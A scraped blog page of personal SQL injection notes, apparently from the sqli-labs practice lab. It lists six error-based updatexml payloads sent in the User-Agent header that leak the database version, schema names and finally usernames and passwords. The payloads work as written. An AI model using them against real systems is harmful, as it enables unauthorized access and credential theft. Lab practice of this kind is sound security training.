zoukankan      html  css  js  c++  java
  • sqli

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) , 1, 1) #  #版本

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) , 1, 1) #  #数据库security

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1) , 1, 1) #  #数据表users

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1) , 1, 1) #  #password

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1) , 1, 1) #  #username

    User-Agent:' or updatexml(1,concat(0x7e,(SELECT concat(username,'|',password) from users limit 0,1),0x7e),1) , 1, 1) #

  • 相关阅读:
    Linq&Lumbda
    PS颜色模式
    WPF绑定方式
    明三杰刘健
    齐有鲍叔,郑有子皮
    朱厚照
    管子&小白
    时间
    人外有人之神箭手养繇基篇
    楚共王
  • 原文地址:https://www.cnblogs.com/llcn/p/12745768.html
Copyright © 2011-2022 走看看